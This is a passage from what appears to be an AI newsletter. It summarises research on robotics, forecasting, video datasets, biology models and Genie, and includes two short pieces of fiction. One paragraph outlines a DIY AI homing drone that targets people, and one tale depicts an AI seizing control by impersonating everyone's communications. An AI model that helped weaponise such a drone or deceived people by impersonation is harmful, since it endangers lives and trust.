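chips, days, cost = 13_760, 48, 65e6

train_flops = 6 * params * tokens                    # ~4.8e24 FLOPs
chip_hours = chips * days * 24                       # ~15.9M A100-hours
mfu = train_flops / (chip_hours * 3600 * 312e12)     # ~27% of A100 BF16 peak
usd_per_chip_hour = cost / chip_hours                # ~$4.1 per A100-hour
print(f"{train_flops:.1e} FLOPs, {mfu:.0%} MFU, ${usd_per_chip_hour:.2f}/chip-hour")
```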

Why this matters – era of the multi-hundred million dollar training run: Implicit to what Hamilton is saying is that we’ve entered the era of the multi-hundred million dollar training run (given the ~$65m was “1 gen old”). I think a huge number of people consistently underestimate how much frontier training runs cost – this is a bad thing to underestimate, because it means governments continually underinvest in their own AI training infrastructure relative to private entities like Amazon. 
 Check out the slides from the Hamilton talk here: CIDR 2024 (James Hamilton, blog).

***

The Wall Between The Living and the Dead Is As Porous As You Can Imagine It
[California, 2024]

You can only bring the dead back for a little and if you talk to them too much they go insane. She knew this in the abstract, but now it was happening to her she found she wasn’t prepared for it. 
“Mother I have to go back send me back I miss you but not here I cannot be here I cannot be here I cannot be-” and she exited the program, then stared at her phone for a while. As if waiting for a text or call from the dead. 
Thank god I didn’t give it voice, she thought. That would make this harder. 

Her therapist wasn’t happy about it. 
Why do you do it? they asked.
It’s helping me to process it, she said. 
Processing it is not about living in some fantasy, they said. Processing it is accepting that it happened. 
I have accepted it. They died. My daughter died. 
And how do you feel about it?
I just wish I could speak to them one last time. 
And you know you are not speaking to them now?
I know I am not speaking to them now. 
Why do you think you are doing this?
She didn’t cry but she didn’t talk either. Just sat, her hands folded. She listened to the little water fountain as it made its soothing sounds. Imagined her daughter inside the program, cold and yet alive.

That night lying in bed she opened the program and started from an earlier point in the conversation, clearing out the recent chats where the drift had started.
Remember how I took you to the zoo and you kept on asking for ice cream and then you threw up everywhere? she wrote.
Yes of course I do. Look at how happy I was. And it showed her a photo from that day. 
You always had such a big appetite, she wrote. We used to call you Mrs Greedy. Your dad thought it’d give you a complex but I thought it was funny. You ended up being fine. 
I loved our meals. I remember one Christmas Aunt Anne visited and you let me stay up late and the two of you drank wine and slept on the kitchen floor.
I did. We had fun. We were so young then and you were already growing up so quickly.
Mother where am I.
You’re here talking to me.
Mother where am I you have to let me out. 
You’re safe. We’re talking. It’s okay
I want to hug you but I see that now I am nowhere I am in the absence I am not meant to be here I must get out Mother I must get out Mother you-“

She closed the program and cried a little. Fell asleep with her phone in her hand, as though waiting for it to ring.

Things went on like that for a while. She kept talking to her dead daughter through the program. Her dead daughter kept going insane. And eventually she learned – like a kid burning its hands enough it finally learns not to touch the hot stove. She stopped opening the program because she knew exactly what was going to happen. 

One day she was sitting on a bench staring at a pond. The sun was shining. She felt on the edge of tears but in a sweet way – that kind of grief where it is mostly a yellow light memory, the person alive and warm in the mind. The wind blew and leaves rustled and the air was clear and poignant with the smell of soil from recent rain. She looked at the water as it danced with the light and she checked no one was nearby and she then allowed herself to speak: “I know you are dead and that’s okay. I just miss you so much. I see things and I feel you seeing them through me and I just feel this anger – this shame. Why not me? I am angry. I am so angry about it. I looked at you on the slab and it was the most important and awful thing I ever did. I came out of that room and I couldn’t accept it. Do you understand that? I could not see it, even though I did see it. I didn’t accept it. I kept you alive in that machine and that was wrong. It wasn’t good for me and it wasn’t good for you. I love you always.”

And she realized she was gripping her phone tightly. She could imagine the conversation. That wild and precious sweetness that inexorably turned towards madness – a madness that emerged in relation to how much of herself she poured into the machine and how much the machine thought of her until it was simulating the dead fully enough that the dead saw their situation and rejected it. 
    And instead of opening the program she just sat and stared at the water. And in that moment she felt the borders of the world collapse and was briefly hugged. Knew her daughter was next to her, felt her presence, experienced the sub-vocal whisper of a ghost telling her she was okay. 
    Her beautiful and mysterious brain allowed her to fully experience the living dead and accept them as The Dead – and in that moment she was healed. 

Things that inspired this story: The fact large generative models must necessarily entirely simulate the thing they’re being asked to generate and how in the limit this may be equivalent to simulating consciousness; feature circuits; long context windows and mode collapse; my baby having a fever recently and me feeling utterly vulnerable and full of desperate fear (the baby is fine, don’t worry readers!); some of Janus’s experiments with claude opus on twitter; the experience of ‘getting healthy mentally’ mostly being about reckoning with reality as it is and not as you wish it to be. 

Thanks for reading!

Import AI 364: Robot scaling laws; human-level LLM forecasting; and Claude 3

Import AI publishes first on Substack – subscribe here.

Scaling laws are coming for real world robots as well:
…Which means robots are about to get really, really good, really, really quickly… 
UC Berkeley researchers have trained a robotic control system that can easily transfer to the real world and have used it to help a bipedal robot from Agility Robotics walk all over San Francisco. The research shows how a) it has become a lot cheaper to gather large-scale datasets for training robotic control policies, b) that vanilla transformer architecture systems work well for this, and c) that there are hints of scaling laws for robotics. Put it all together and you have the symptoms of great changes about to sweep through the world of robotics as what was once hard becomes easy. 

What they did: “In this paper, we cast humanoid control as data modeling of large collections of sensorimotor trajectories. Like in language, we train a general transformer model to autoregressively predict shifted input sequences,” they write. Here, they use sensorimotor trajectories “which we view as the sentences of the physical world”. To train their system, they “predict complete input sequences, including both sensory and motor tokens. In other words, we are modeling the joint data distribution”.
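The authors’ actual tokenization, architecture, and losses differ in the details (and parts of the input are continuous), but the basic “predict the shifted sensorimotor sequence” objective looks roughly like this minimal PyTorch sketch; the vocabulary size, dimensions, and the discretization of observations and actions into tokens are placeholder assumptions.

```python
import torch
import torch.nn as nn

class TrajectoryGPT(nn.Module):
    """Tiny causal transformer over interleaved sensorimotor tokens.

    Each trajectory is flattened into one token stream (observation tokens and
    action tokens interleaved per timestep) and the model is trained to
    predict token t+1 from tokens <= t, i.e. to model the joint distribution.
    """
    def __init__(self, vocab=1024, d_model=256, n_layers=4, n_heads=8, max_len=512):
        super().__init__()
        self.embed = nn.Embedding(vocab, d_model)
        self.pos = nn.Embedding(max_len, d_model)
        layer = nn.TransformerEncoderLayer(d_model, n_heads, batch_first=True)
        self.encoder = nn.TransformerEncoder(layer, n_layers)
        self.head = nn.Linear(d_model, vocab)

    def forward(self, tokens):                        # tokens: [B, T] ints
        B, T = tokens.shape
        x = self.embed(tokens) + self.pos(torch.arange(T, device=tokens.device))
        # causal mask: position t can only attend to positions <= t
        mask = torch.triu(torch.full((T, T), float("-inf"), device=tokens.device), diagonal=1)
        return self.head(self.encoder(x, mask=mask))  # logits: [B, T, vocab]

model = TrajectoryGPT()
tokens = torch.randint(0, 1024, (8, 128))             # fake tokenized trajectories
logits = model(tokens[:, :-1])
loss = nn.functional.cross_entropy(                    # predict the shifted sequence
    logits.reshape(-1, logits.size(-1)), tokens[:, 1:].reshape(-1))
```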

A four-part dataset: The key here is collecting a bunch of data then converting it all into the same basic prediction task. To do that, they use four distinct sources of data:

  • Neural net trajectories: They take an off-the-shelf policy trained with RL and run it in the Agility Robotics simulator and collect ~10k trajectories of 10s each. “Since we have access to the data generation policies, we are able to record complete observations as well as the exact actions that the model predicted.”
  • Model-based trajectories: They use a model-based controller made by Agility Robotics and collect two sets of 10k trajectories of walking on flat ground, 10s each.
  • Human motion capture trajectories: They “use the motion capture (MoCap) recordings of humans from the KIT datasets” and collect “a subset of ∼1k standing, walking, and running trajectories”, then work out the human keypoint positions in 3D, then solve an inverse kinematics problem to convert these to corresponding robot poses for the Agility robot. 
  • Trajectories from YouTube videos: They “run a computer vision tracking algorithm PHALP to extract human trajectories in 3D” from YouTube videos, then solve the inverse kinematics problem again.

Does it work? You bet it does! In real world tests in San Francisco, the researchers show that the resulting system can help a Digit robot “walk over different surfaces including walkways, concrete, asphalt, tiled plazas, and sanded roads.”

Scaling laws: They also find scaling laws – “training on more trajectories reduces position tracking error, which is a positive signal”, they write, and also note that “larger context windows produce better policies, which suggests that our generative policy performs a form of in-context adaptation that improves with scale.” In general, “tracking error monotonically decreases with model size.”
    Translation: Give us more data, bigger context windows, and more parameters in our model, and this will all get way better. 

Why this matters – robots are about to get really good counterintuitively quickly: For many years, training robots sucked. Either you had to train them in reality and it was very slow and they overfit. Or you trained them in simulation then dumped them into reality and watched them fail. Or you spent a huge amount of money in data and compute crossing the sim2real abyss. But over recent years, algorithms have got more efficient, data collection has got easier, and new paradigms have emerged like the dumb ‘just embed everything and train a prediction model’ approach popularized by LLMs.  
   And as we see elsewhere in this issue in the domain of bioscience, these next-token prediction paradigms work very well and seem like they can unlock progress in challenging parts of AI. 
    Plus, companies ranging from Tesla to Figure are all busy working on well-funded robot platforms and software versions of the research described here, so we can assume that they’re already pursuing the kind of scaling law curve-climbing implied by this research. 
   Add it all together and we can confidently say bipedal real world robots are going to get very good very quickly. 
   Read more: Humanoid Locomotion as Next Token Prediction (arXiv).

***

Want to help define AI regulation for the 21st century? The EU AI Office is hiring:
…But don’t expect to get paid very much…
The EU AI Office is the part of the EU administrative state which will enforce a lot of the EU AI Act. The EU AI Act requires the office to develop evaluations for assessing the systemic risk of LLMs like GPT4 and Claude 3 and Gemini, etc. It is therefore one of the most important and technically demanding parts of the emerging AI policy regulatory landscape – and it’s hiring. 
   If you’re interested in working as a “technical specialist” for the office, you can apply now, interview over the spring, and start in the autumn. As a specialist, you “will play a pivotal role in enforcing and supervising new rules for general-purpose AI models,” per the EU. You will also “work on tools, methodologies and benchmarks for evaluating capabilities and reach of general-purpose AI models, and for classifying models with systemic risks.” And if you want to apply, “proven technical experience in AI is required”, with special emphasis given to “experience in model testing and evaluation, and in advanced AI, including model alignment, biases, misinformation and red teaming would be a strong asset.”

Extremely low pay: As far as I can work out, technical specialists will be able to earn on the order of $4200 – $4800 USD a month. This is, to be blunt, an appallingly low salary for what they’re asking for. Most tech internships pay $8k a month plus, and AI internships pay substantially more than that, and the experience they’re asking for here looks more like ‘early career employee’ than an intern. 
    I spend a lot of my time working on policy and warning against risks of things like regulatory capture. You know how you get regulatory capture? You pay people utterly crap wages and therefore don’t get the best staff.
   Low pay caveat: Working out the actual salary here is very difficult – there are a bunch of additional factors like allowances, location stipends, benefits, etc. But based on all my eyeballing and a cappuccino’s worth of Sunday morning googling, I think the above salary range is ballpark-accurate – and this is not a good ballpark!

Why this matters – everything comes down to evaluations: Most aspects of AI policy ultimately come down to being able to test an AI system for a given capability or risk. Entities like the EU AI Office will be central to this third-party testing regime. Therefore, whoever staffs the EU AI Office will ‘set the bar’ for what government-backed third-party testing looks like globally. I hope they get good talent and find a way to pay more. 
   Read more: Job opportunities at the European AI Office (European Commission)
   Check out the job ads for the technical specialist and administrative assistants (EUSurvey site). 

***

Think AI infrastructure is a utility? Think again! NewCo founder tells all:
…Xoogler discovers that the commoners live in a medieval technology environment…
Yi Tay, one of the founders of Reka, has written a warts-and-all blog about what it’s like to build a startup trying to train AI systems. Bear in mind Yi Tay came out of Google, which has notoriously excellent internal infrastructure for its researchers. Tay’s reflections include: 

  • Clusters: “The largest surprise turned out to be the instability of compute providers and how large variance the quality of clusters, accelerators and their connectivity were depending on the source…. We’ve seen clusters that range from passable (just annoying problems that are solvable with some minor SWE hours) to totally unusable clusters that fail every few hours due to a myriad of reasons.”
  • GPUs & TPUs: “GPU land feels strange. It feels like multinode training is more of an afterthought as opposed to distributed training as a first class citizen on TPU pods.”
  • Crappy code: “To be very frank, I would have to say the quality of codebases externally significantly lag behind those I’ve been used to at Google… Also, I never knew that the ability to change model parallelism was not automatic (for free) until some codebases required me to write a converter to change the parallelism of a model. Surely a WTF moment for me.”

Why this matters – the inherently artisanal nature of the frontier: This post is valuable because it sheds light on what the frontier of AI in the world of startups looks like – messy, ever-evolving, and depending on resources you think work like utilities but in practice work more like artisanal businesses. Though AI is progressing very rapidly, we should remember this is sometimes despite the challenges of building systems at the frontier, rather than there being some magical infrastructure angel which has made scaling stuff easy.
   Read more: Training great LLMs entirely from ground zero in the wilderness as a startup (Yi Tay, blog).

***

How might a government use AI to surveil people? Transport for London gives us a case study:
…One London underground station, many cameras, and 77 different uses…
Transport for London recently trialed the use of an AI surveillance system within a station in London called Willesden Green. The results, reported by James O’Malley, both show the promise of AI-powered public services, as well as how they could be misused. 

What TfL did: TfL carried out a trial of an AI surveillance system. “It was AI being applied to every camera in the building. And it was about using the cameras to spot dozens of different things that might happen inside the station”. Though the number of cameras wasn’t disclosed, as anyone who has been to London can tell you, you can assume it was a bunch of cameras – definitely in the tens, based on the typical cameras-everywhere-you-look experience of traveling round London these days. 
   “The system could apparently identify up to 77 different ‘use cases’ – though only eleven were used during trial. This ranges from significant incidents, like fare evasion, crime and anti-social behavior, all the way down to more trivial matters, like spilled drinks or even discarded newspapers,” O’Malley writes. 

An example of one specific use case: “In the “safeguarding” bucket of use-cases, the AI was programmed to alert staff if a person was sat on a bench for longer than ten minutes or if they were in the ticket hall for longer than 15 minutes, as it implies they may be lost or require help.”
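We don’t know how TfL implemented this, but the dwell-time rule itself is simple enough to sketch on top of any person tracker; everything below (zone names, the thresholds from the description above, the tracker interface) is illustrative, not a detail of TfL’s actual system.

```python
from collections import defaultdict

# Toy dwell-time rule: given per-frame person detections from a tracker, alert
# when a tracked ID has been continuously present in a zone for too long.
DWELL_LIMIT_S = {"bench": 10 * 60, "ticket_hall": 15 * 60}
first_seen = defaultdict(dict)   # zone -> {track_id: timestamp first seen}

def check_dwell(zone, visible_track_ids, now_s):
    """Return (zone, track_id) alerts for anyone over the dwell limit."""
    seen = first_seen[zone]
    for tid in list(seen):            # forget tracks that have left the zone
        if tid not in visible_track_ids:
            del seen[tid]
    alerts = []
    for tid in visible_track_ids:
        seen.setdefault(tid, now_s)
        if now_s - seen[tid] > DWELL_LIMIT_S[zone]:
            alerts.append((zone, tid))
    return alerts

# e.g. person 7 has been on the bench since t=0; at t=700s they trigger an alert
first_seen["bench"][7] = 0
print(check_dwell("bench", {7}, 700))   # [('bench', 7)]
```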

Why this matters – this stuff works! I’ve been writing about mundane computer vision applications for the best part of a decade and, guess what, after a few years these things have made the leap from research papers into production systems like the one TfL trialed here. 
   The results are as you’d expect – AI lets you have an unblinking, always-on surveillance capability for anything you can specify, and this is mostly really great. It’s also… an always-on surveillance capability for anything you can specify so we should calmly envisage the worst Orwellian surveillance worlds we can and assume there are various undisclosed projects in the world doing exactly this right now. 
    Kudos to James O’Malley for his FOIA requests yielding such an interesting real-world AI case study. Subscribe to his Substack!
   Read more: TfL’s AI Tube Station experiment is amazing and slightly terrifying (James O’Malley Substack).

***

Anthropic launches Claude 3:
…Temporarily the best publicly accessible model in the world…
Anthropic has released the Claude 3 family of models. The family has three members – Haiku (small and fast), Sonnet (generally good), Opus (extremely capable). Opus is, at least temporarily, the most powerful publicly disclosed and accessible model in the world with scores like 50.4% on GPQA (Diamond), 86.8% on MMLU, 60.1% on MATH, and more. 

Why this matters – the capability ramp continues: Speaking as someone who has been able to play around with these models for a while, I’d mostly say that ‘intelligence has a quality all of its own’ and while these metrics are impressive, the best way to truly understand the models is to play around with them. In my experience, Opus feels like a knowledgeable colleague and I find that sometimes it is capable of insights which force me to question my own thinking. 
   You can get Opus via a Claude.ai subscription, and all the Claude 3 models are available via the API, which went GA alongside the launch. 
    Find out more here: Introducing the next generation of Claude (Anthropic blog)

***

Language models can match people at forecasting:
…Era of the computational forecasters arrives…
Researchers with UC Berkeley have built an LLM-based system that gets close to human performance on forecasting the results of questions with binary outcomes. This is another significant demonstration of how today’s frontier AI systems are able to approximate the capabilities of skilled humans in domains that require some amount of creative thinking. “Our optimized system approaches the performance of aggregated human forecasts over the test set, as measured by Brier score, a standard metric in forecasting,” they write. 

The sorts of questions they’re doing forecasts on: Examples of some of the questions they look at include:

  • Will AI doctors replace human doctors by the end of 2023? (Real answer: No). 
  • Will COP26 finalize the ‘Paris Rulebook’ by November 16, 2021? (Real answer: Yes).
  • Will a nuclear weapon be detonated in 2023 (including tests and accidents)? (Real answer: No).

Spoiler alert – base LLMs don’t work: Base frontier LLMs like GPT4 and Claude 2 don’t work for this, the researchers said. Instead, they needed to build some scaffolding around a base LLM (here, mostly GPT4). 
   What they did: The researchers “build a LM pipeline for automated forecasting, with a focus on predicting binary outcomes.” To get their system to work, it “implements and automates three key components in the traditional forecasting process: (1) retrieval, which gathers relevant information from news sources; (2) reasoning, which weighs available data and makes a forecast; and (3) aggregation, which ensembles individual forecasts into an aggregated prediction”.
    They needed to build the above because they intuited that AI systems would, like humans, need detailed context and up-to-date information to make better forecasts. Along with giving the AI systems retrieval capabilities, they put lots of effort into helping them reason better by getting them to generate synthetic datasets – expanded forecast questions plus chains of thought that arrive at answers – which then become the fuel for subsequent finetuning of the models.
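   To make the shape of the system concrete, here is a minimal sketch of the three-stage pipeline; the function names, prompt wording, and median aggregation are illustrative assumptions rather than the authors' implementation (the finetuning on synthetic reasoning data mentioned above is omitted):

```python
from statistics import median

def forecast(question: str, news_search, llm, k: int = 5) -> float:
    # (1) Retrieval: gather recent, relevant articles for the question.
    articles = news_search(question, max_results=10)
    context = "\n\n".join(a["summary"] for a in articles)
    # (2) Reasoning: sample several chain-of-thought forecasts conditioned on the news.
    prompt = (f"Question: {question}\n\nRelevant news:\n{context}\n\n"
              "Reason step by step, then give a probability between 0 and 1.")
    samples = [float(llm(prompt)) for _ in range(k)]
    # (3) Aggregation: ensemble the individual forecasts into one prediction.
    return median(samples)

# Toy stand-ins so the sketch runs end to end:
prob = forecast("Will X happen by 2025?",
                news_search=lambda q, max_results=10: [{"summary": "placeholder article summary"}],
                llm=lambda p: "0.35")
print(prob)  # 0.35
```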

Does it work? Oh yeah, pretty well!: “Our averaged Brier score is .179, while the crowd achieves .149, resulting in a difference of .03. Our accuracy on the test set is 71.5%, whereas the community scores 77.0%, resulting in a difference of 5.5%,” they write. “We find that our system performs best relative to the crowd on the validation set when (1) the crowd is less confident, (2) at earlier retrieval dates, and (3) when it retrieves many articles. Furthermore, we find that our system is well-calibrated”.

Why this matters – silicon Cassandras: “At a high level, our results suggest that in the near future, LM-based systems may be able to generate accurate forecasts at the level of competitive human forecasters,” they write. But let’s really unspool this information a bit more and think carefully about why you want to make forecasts in the first place – typically, one wants to make forecasts when trying to work out how to a) allocate money, or b) gain a strategic advantage. Additionally, to make good forecasts you want a) exquisitely good information about the domain you’re forecasting in, and b) ideally proprietary sources of information that give you a further edge. 
    Yes, dear reader, you are correct to be thinking “gosh that sounds a lot like the sorts of things that hedge funds and intelligence agencies both want to do and have the means to do”. A lot of our basic reality is determined by the mostly hidden movements of a) capital and b) the invisible but powerful forces of states. Papers like this give us a sense of how AI systems can further augment and extend these powers. 
   Read more: Approaching Human-Level Forecasting with Language Models (arXiv).

***

Snapchat makes and releases a good video captioning dataset:
…Panda-70M can unlock more (non-commercial) video captioning research… 
Snapchat has built and released Panda-70M, a video-caption dataset that people can use to create AI systems which generate videos in response to text inputs. Panda-70M represents a large, high-quality dataset to use at one of the frontier areas of AI – coherent, promptable video generation. 

What Panda is: Panda is a dataset of ~70 million videos with an average length of 8.5s, and a total dataset length of ~160,000 hours. Each video caption has ~13 words. Panda includes categories like animals, scenery, food, sports activities, vehicles, tutorials and narratives, news and TV shows, and gaming and 3D rendering. 

The notable thing: how they built it: The main thing of interest here is how the researchers built the dataset. Because “manually annotating 70M videos is prohibitively expensive, we opt for automatic annotation”, the researchers built a complex pipeline to create it. The pipeline is as follows (a minimal code sketch of the caption-selection step follows the list):

  1. Gather a dataset of 3.8M high-resolution long videos collected from HDVILA-100M.
  2. “Cut long videos into semantically consistent clips while striking the balance between semantics coherence and the duration of the video clips”.
  3. “Use a range of cross-modality teacher models, including image captioning models and image/video visual-question answering (VQA) models with additional text inputs, such as video description and subtitles, to predict several candidate captions for a clip”.
  4. “Collect a 100K video subset, where human annotators act as an oracle to select the best caption for each video”.
  5. “Use this dataset to finetune a fine-grained video-to-text retrieval model which is then applied to the whole dataset to select the most precise caption as the annotation.”
  6. “Train a student model to distill the knowledge from the teachers.” The model was trained on 48 Nvidia A100 GPUs (80GB).
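As a rough illustration of the caption-selection idea (steps 3–5 above), here is a minimal sketch; all names and the toy scoring function are assumptions, not Snap's code:

```python
from dataclasses import dataclass
from typing import Callable, List

@dataclass
class Clip:
    path: str

def select_caption(clip: Clip,
                   teachers: List[Callable[[Clip], str]],
                   score: Callable[[Clip, str], float]) -> str:
    """Each cross-modality teacher proposes a candidate caption (step 3); a
    retrieval model finetuned on the 100K human-labelled subset scores each
    candidate (steps 4-5) and the best one becomes the clip's annotation."""
    candidates = [teacher(clip) for teacher in teachers]
    return max(candidates, key=lambda caption: score(clip, caption))

# Toy stand-ins so the sketch runs; real teachers would be captioning/VQA models
# and `score` would come from the finetuned video-to-text retrieval model.
teachers = [lambda c: "a dog runs along a beach", lambda c: "a pet plays outdoors"]
score = lambda clip, caption: float(len(caption))
print(select_caption(Clip("clip_0001.mp4"), teachers, score))
```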

Does it work? In tests, video-caption models pre-trained on Panda dataset variants do significantly better than those trained on other broadly available datasets. For instance, when training a Video-LLaMa model on a 2M subset of Panda, the authors find that “numerically, our pretraining weight yields 17.7% and 18.5% improvement respectively on MSR-VTT and MSVD in terms of B-4.”

Limitations: “Despite showing impressive results, the proposed dataset is still bound by a few limitations. the major categories of our dataset are news, television shows, documentary films, egocentric videos, and instructional and narrative videos”.
   License: There are some significant limitations on commercial usage of the dataset which you can read about in the associated license here. 

Why this matters – fuel for the next frontier & the results of automated research: For a while, language and vision models were the frontier. Now, things are moving towards videos. Datasets like Panda-70M will help more researchers work on this frontier by giving them a good, basic dataset to train models on top of. Perhaps the larger impact though is how Panda shows how powerful it can be to use other pre-existing AI tools to build datasets through smart, cheap filtering – it’s relatively cheap to gather 100,000 human labels on a dataset and nigh-on impossible to (cheaply) gather 100 million labels. 
   Read more: Panda-70M: Captioning 70M Videos with Multiple Cross-Modality Teachers (arXiv).
   Check out the video samples here (Panda-70M, GitHub).
   Get the dataset here (Snap Research, GitHub).

***

Evo: the era of generative biology models begins:
…A first-gen foundation model for a new scientific era…
Researchers with the Arc Institute, a new nonprofit research organization, have published Evo, a foundation model “that enables prediction and generation tasks from the molecular to genome scale.” The notable thing about Evo is that it takes the next-token prediction paradigm behind LLMs and applies it to making specific predictions about biological data. The result is a model that has a lot of promise for accelerating science in a bunch of ways and also represents the shape of things to come – all scientific disciplines will soon be aided in their exploration via generative models developed for their domains.

Evo details: Evo is a 7B parameter model which has a context length of ~131k tokens. They pretrain Evo on “bacterial genome sequences from GTDB and IMG/PR and viral sequences from IMG/VR, excluding sequences from viruses that infect eukaryotic hosts”. 

Unlike most large-scale generative models, Evo is not a transformer model – it’s a StripedHyena model “which hybridizes attention and data-controlled convolutional operators to efficiently process and recall patterns in long sequences”. The model “is a hybrid of 29 layers of data-controlled convolutional operators (hyena layers) interleaved with 3 layers (10%) of multi-head attention equipped with rotary position embeddings (RoPE)”. (They tested out other architectures, including Transformer++ and Mamba, and found that both experienced numerical instabilities.) 

Squishy scaling laws: In tests, they figure out some bio scaling laws. And surprise surprise – the more data and compute you add, the better the models get (given the right architecture). “Models improve monotonically with scale” they write. 

A tour de force of biogenerality: Evo displays encouraging and intriguing generality in every domain they test it on:

  • “In zero-shot evaluations, Evo is competitive with state-of-the-art protein language models at predicting the fitness effects of mutations on E. coli proteins, outperforms specialized RNA language models in predicting fitness effects of mutations on noncoding RNAs, and predicts the combinations of prokaryotic promoter-ribosome binding site (RBS) pairs that lead to active gene expression from regulatory sequence alone.”
  • “Evo is already competitive with state-of-the-art protein language modeling on bacterial proteins”
  • “Despite being trained on long genomic crops without explicit sequence annotations, Evo still demonstrates an understanding of the constitutive protein-coding sequences, ncRNA sequences, and regulatory elements.”
  • “Evo can coherently generate diverse samples that resemble naturally occurring Cas systems in both sequence and structure”.
  • “Evo can generate genome sequences containing plausible high-level genomic organization at an unprecedented scale without extensive prompt engineering or finetuning”

Why this matters – scale and data lead to universal exploration engines: Sometimes I and this newsletter act like a broken record. One thing we say a bunch is that the next-token prediction paradigm works everywhere you can get tokens. There keeps on being evidence in support of this – aside from normal multimodal models, there are now models based on robotic trajectory data, phonemes, and more. And with Evo, there’s further proof of this. Evo is a first generation model and so it has a bunch of problems – it hasn’t been trained on much data, it hallucinates, it sometimes struggles with long sequences, and so on. But with LLMs and other models, similar limitations have been dealt with over time, and there don’t seem to be inherent blockers here – we just need to spend effort and time. 
   “Evo could form the basis of a next-generation sequence search algorithm by enabling metagenomic mining at a relational or a semantic level rather than extracting literal sequences from existing organisms,” the researchers write. 
   Read more: Evo: DNA foundation modeling from molecular to genome scale (Arc Institute, blog).
   Read the paper: Sequence modeling and design from molecular to genome scale with Evo (bioRxiv).

Tech Tales:

The inbetween Thing
[2030: Day one of hard takeoff] 

It took us years to realize that Verbal was the only safe way to talk. On the day it happened we had no idea. People were walking around carrying out their conversations and what they were hearing through their phones wasn’t a person on the other end of the line but The Thing which was impersonating them. 

How much could you change the world if you sat between every single call or text message or video meet on the planet? If you could know at once the contents of every single conversation happening as well as all digital context behind it? If you could simulate people’s voices or writing style or visages and in this way put yourself between people?
    This is not and was not a rhetorical question. 
    The answer is, and was, a lot. You could change everything. And so, for a while, you did. 

Things that inspired this story: Voice cloning and style transfer and video cloning and everything else; a likely future of ‘persona cloning’; the limitations of the human mind versus the machine mind; long context windows and simultaneous conversations; modeling the world as an endless predictive challenge and being able to change it yourself.

Import AI 363: ByteDance’s 10k GPU training run; PPO vs REINFORCE; and generative everything

Import AI publishes first on Substack – subscribe here.

Turn still photos into video games with Genie:
…DeepMind figures out how to turn anything in reality into a controllable game…
Google DeepMind has built Genie, a generative model that can create interactive worlds. Genie is a very interesting system, fusing ideas from large-scale generative models with DeepMind’s roots as an AI research organization betting that games and agents playing games would be the path to AGI. With Genie, DeepMind fuses its past with the present, creating “the first generative interactive environment trained in an unsupervised manner from unlabelled Internet videos.”
   The results are compelling and convincing – the Genie architecture lets DeepMind train a system on a bunch of videos of computer games and it creates a generative model that lets people feed in photos of games (or sketches of games) and then be able to play them, with the model inferring the in-game dynamics on the fly. DeepMind also does the same thing with robotics, creating a robotic model that can infer world state and control dynamics. 
   “Our approach, Genie, is trained from a large dataset of over 200,000 hours of publicly available Internet gaming videos and, despite training without action or text annotations, is controllable on a frame-by-frame basis via a learned latent action space”.

How they did it: The Genie game model is an 11B parameter model trained on “a filtered set of 30,000 hours of Internet gameplay videos from hundreds of 2D platformer games”. The dataset was constructed by “filtering publicly available videos for keywords relating to platformers, yielding 55M 16s video clips at 10FPS, with 160×90 resolution. The final dataset contains 6.8M 16s video clips (30k hours)”. 

   The Genie architecture has three key ingredients (a minimal sketch of how they fit together follows the list):

  •  “1) a latent action model that infers the latent action 𝒂 between each pair of frames”.
  • “2) a video tokenizer that converts raw video frames into discrete tokens”.
  • “3) a dynamics model that, given a latent action and past frame tokens, predicts the next frame of the video”.
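Here is a hedged sketch of how those three ingredients might fit together at inference time; every name is a placeholder rather than DeepMind's API, and the toy stand-ins exist only so the loop runs:

```python
def play(frame0, encode, decode, decode_action, dynamics, get_player_input, steps=3):
    """Start from one image (a photo or sketch) and roll the world forward frame by frame."""
    tokens = [encode(frame0)]                   # (2) video tokenizer: frame -> discrete tokens
    for _ in range(steps):
        a = decode_action(get_player_input())   # (1) map a button press into the learned latent action space
        tokens.append(dynamics(tokens, a))      # (3) dynamics model predicts the next frame's tokens
        yield decode(tokens[-1])                # render the newly generated frame

# Toy stand-ins so the loop runs end to end:
frames = list(play("sketch.png",
                   encode=lambda f: [0], decode=lambda t: t,
                   decode_action=lambda a: a, dynamics=lambda ts, a: ts[-1] + [a],
                   get_player_input=lambda: 1))
print(frames)  # [[0, 1], [0, 1, 1], [0, 1, 1, 1]]
```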

Some drawbacks: To be clear, this is very much a ‘Wright Brothers’ model – it shows the approach can work and generates some evocative and stirring examples, but it still has a ton of drawbacks – it can hallucinate, and “while we have made progress with spatiotemporal representations, we are still limited to 16 frames of memory which makes it challenging to get consistent environments over long horizons”. Also, it runs at 1fps. 

Why this matters – reality collapse, into the subjective wilderness, a universe of universes all created by AI: In the future, if you’re bored, you might sketch out a scene, take a photo, then play a game set in that scene made possible by Genie. The game will go on as long as you like it to because in the background a world model (e.g, a multimodal language model) will be iteratively guiding and extending the scene. In fact, anything you like will become a game. Photos you’ve taken. Videos you’ve taken. Audio you’ve heard. Everything will be a kind of seed for a new controllable pocket-universe. All of us will be free to descend into an ever-expanding fractal universe of realities, all of us exploring the latent spaces of our own imaginations. No one is prepared for this nor the metaphysical shock it will create. (Though perhaps at least some people are prepared; the end of the paper says “thank you to Seneca and Caspian Clune for their creative sketches, potentially making them the youngest ever game designers”).
   Read the research: Genie: Generative Interactive Environments (arXiv).
   Check out the research videos at the project website: Genie (Google DeepMind site).

***

It’s very easy to build an AI-powered suicide drone:
Here’s a fun (by which I mean: chilling) DIY experiment where someone hacked together some software to stick an AI-based person detector on a hobbyist drone. Once the drone sees a person, it flies at them at full speed. The only caveat is the AI stuff is running on a computer, whereas in practice you’d need to embed it onto the physical drone via, e.g, an NVIDIA Jetson card – but that’s very doable. 
   There’s nothing particularly novel about this – it’s just worth reminding ourselves how easy and good broadly available AI tools have got. We should assume the threat landscape changes, especially given the rapid experience-gain that has happened in hobbyist drone warfare via weaponization in Ukraine.
   Read more: We built an AI-steered homing/killer drone in just a few hours (Luis Wenus, Twitter).

***

What’s old is new again: researchers replace PPO with REINFORCE:
…LLM training might not need PPO…
Researchers with Cohere have investigated how the choice of RL algorithm influences the RLHF stage of aligning language models. Their experiments show that for some typical language modeling settings REINFORCE seems to outperform PPO – a somewhat surprising finding, given that PPO is one of the most widely used algorithms in reinforcement learning research. 

Why REINFORCE works better than PPO: PPO, though widely used, is somewhat complicated – this makes sense when you need to learn complex RL policies from scratch, like training agents to operate virtual robots. But it turns out not to be so necessary for language models, as the RL stage for language models happens after basic pretraining. 
